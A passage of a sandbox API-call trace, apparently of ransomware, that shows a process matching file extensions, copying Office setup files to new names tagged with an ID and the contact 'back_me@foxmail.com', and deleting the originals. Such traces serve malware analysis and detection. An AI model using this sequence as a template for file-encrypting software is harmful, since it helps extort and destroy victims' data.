[0040.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.348] lstrlenW (lpString=".dbf") returned 4 [0040.348] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.348] lstrlenW (lpString=".1cd") returned 4 [0040.348] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.349] lstrlenW (lpString=".jpg") returned 4 [0040.349] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.349] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.349] lstrlenW (lpString="OfficeMUI.XML") returned 13 [0040.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.351] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=5557) returned 1 [0040.351] CloseHandle (hObject=0x1b0) returned 1 [0040.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 0x20 [0040.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.351] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.352] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.352] GetLastError () returned 0x0 [0040.352] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x15b5, lpOverlapped=0x0) returned 1 [0040.353] WriteFile (in: hFile=0x1a0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0040.354] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.354] WriteFile (in: hFile=0x1a0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xee, lpOverlapped=0x0) returned 1 [0040.354] SetEndOfFile (hFile=0x1a0) returned 1 [0040.354] CloseHandle (hObject=0x1a0) returned 1 [0040.355] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.355] SetEndOfFile (hFile=0x1b0) returned 1 [0040.356] CloseHandle (hObject=0x1b0) returned 1 [0040.356] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.356] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 1 [0040.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.356] lstrlenW (lpString=".doc") returned 4 [0040.356] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.356] lstrlenW (lpString=".docx") returned 5 [0040.357] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.357] lstrlenW (lpString=".pdf") returned 4 [0040.357] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.357] lstrlenW (lpString=".xls") returned 4 [0040.357] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.357] lstrlenW (lpString=".xlsx") returned 5 [0040.357] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.357] lstrlenW (lpString=".ppt") returned 4 [0040.357] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.357] lstrlenW (lpString=".zip") returned 4 [0040.357] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.357] lstrlenW (lpString=".rar") returned 4 [0040.357] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.357] lstrlenW (lpString=".bz2") returned 4 [0040.357] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.357] lstrlenW (lpString=".7z") returned 3 [0040.357] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.357] lstrlenW (lpString=".dbf") returned 4 [0040.357] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.357] lstrlenW (lpString=".1cd") returned 4 [0040.357] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.357] lstrlenW (lpString=".jpg") returned 4 [0040.357] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.357] lstrlenW (lpString=".doc") returned 4 [0040.357] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.357] lstrlenW (lpString=".docx") returned 5 [0040.357] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.357] lstrlenW (lpString=".pdf") returned 4 [0040.358] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.358] lstrlenW (lpString=".xls") returned 4 [0040.358] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.358] lstrlenW (lpString=".xlsx") returned 5 [0040.358] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.358] lstrlenW (lpString=".ppt") returned 4 [0040.358] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.358] lstrlenW (lpString=".zip") returned 4 [0040.358] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.358] lstrlenW (lpString=".rar") returned 4 [0040.358] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.358] lstrlenW (lpString=".bz2") returned 4 [0040.358] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.358] lstrlenW (lpString=".7z") returned 3 [0040.358] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.358] lstrlenW (lpString=".dbf") returned 4 [0040.358] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.358] lstrlenW (lpString=".1cd") returned 4 [0040.358] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.358] lstrlenW (lpString=".jpg") returned 4 [0040.358] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.358] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.358] lstrlenW (lpString="OfficeMUISet.XML") returned 16 [0040.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.359] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=819) returned 1 [0040.690] CloseHandle (hObject=0x1b0) returned 1 [0040.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 0x20 [0040.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.690] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.691] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0041.402] GetLastError () returned 0x0 [0041.402] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x333, lpOverlapped=0x0) returned 1 [0041.404] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x340, lpOverlapped=0x0) returned 1 [0041.405] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.405] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0041.405] SetEndOfFile (hFile=0x1a8) returned 1 [0041.405] CloseHandle (hObject=0x1a8) returned 1 [0041.406] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.406] SetEndOfFile (hFile=0x1b0) returned 1 [0041.407] CloseHandle (hObject=0x1b0) returned 1 [0041.407] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.407] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 1 [0041.407] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.407] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.407] lstrlenW (lpString=".doc") returned 4 [0041.407] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.407] lstrlenW (lpString=".docx") returned 5 [0041.408] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0041.408] lstrlenW (lpString=".pdf") returned 4 [0041.408] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.408] lstrlenW (lpString=".xls") returned 4 [0041.408] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.408] lstrlenW (lpString=".xlsx") returned 5 [0041.408] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0041.408] lstrlenW (lpString=".ppt") returned 4 [0041.408] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.408] lstrlenW (lpString=".zip") returned 4 [0041.408] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.408] lstrlenW (lpString=".rar") returned 4 [0041.408] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.408] lstrlenW (lpString=".bz2") returned 4 [0041.408] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.408] lstrlenW (lpString=".7z") returned 3 [0041.408] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.408] lstrlenW (lpString=".dbf") returned 4 [0041.408] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.408] lstrlenW (lpString=".1cd") returned 4 [0041.408] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.408] lstrlenW (lpString=".jpg") returned 4 [0041.408] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.408] lstrlenW (lpString=".doc") returned 4 [0041.408] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.408] lstrlenW (lpString=".docx") returned 5 [0041.409] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0041.409] lstrlenW (lpString=".pdf") returned 4 [0041.409] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.409] lstrlenW (lpString=".xls") returned 4 [0041.409] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.409] lstrlenW (lpString=".xlsx") returned 5 [0041.409] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0041.409] lstrlenW (lpString=".ppt") returned 4 [0041.409] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.409] lstrlenW (lpString=".zip") returned 4 [0041.409] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.409] lstrlenW (lpString=".rar") returned 4 [0041.409] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.409] lstrlenW (lpString=".bz2") returned 4 [0041.409] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.409] lstrlenW (lpString=".7z") returned 3 [0041.409] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.409] lstrlenW (lpString=".dbf") returned 4 [0041.409] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.409] lstrlenW (lpString=".1cd") returned 4 [0041.409] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0041.409] lstrlenW (lpString=".jpg") returned 4 [0041.409] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.409] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.409] lstrlenW (lpString="Office32MUI.XML") returned 15 [0041.410] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.410] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1383) returned 1 [0041.410] CloseHandle (hObject=0x1b0) returned 1 [0041.411] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 0x20 [0041.411] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.411] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.411] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.411] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.411] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0041.412] GetLastError () returned 0x0 [0041.412] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x567, lpOverlapped=0x0) returned 1 [0041.414] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x570, lpOverlapped=0x0) returned 1 [0041.415] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.415] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0041.415] SetEndOfFile (hFile=0x1a8) returned 1 [0041.415] CloseHandle (hObject=0x1a8) returned 1 [0041.415] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.415] SetEndOfFile (hFile=0x1b0) returned 1 [0041.416] CloseHandle (hObject=0x1b0) returned 1 [0041.416] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.416] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 1 [0041.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.417] lstrlenW (lpString=".doc") returned 4 [0041.417] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.417] lstrlenW (lpString=".docx") returned 5 [0041.417] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.417] lstrlenW (lpString=".pdf") returned 4 [0041.417] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.417] lstrlenW (lpString=".xls") returned 4 [0041.417] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.417] lstrlenW (lpString=".xlsx") returned 5 [0041.417] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.417] lstrlenW (lpString=".ppt") returned 4 [0041.417] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.417] lstrlenW (lpString=".zip") returned 4 [0041.417] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.417] lstrlenW (lpString=".rar") returned 4 [0041.417] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.417] lstrlenW (lpString=".bz2") returned 4 [0041.417] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.417] lstrlenW (lpString=".7z") returned 3 [0041.417] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.417] lstrlenW (lpString=".dbf") returned 4 [0041.417] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.417] lstrlenW (lpString=".1cd") returned 4 [0041.417] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.418] lstrlenW (lpString=".jpg") returned 4 [0041.418] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") 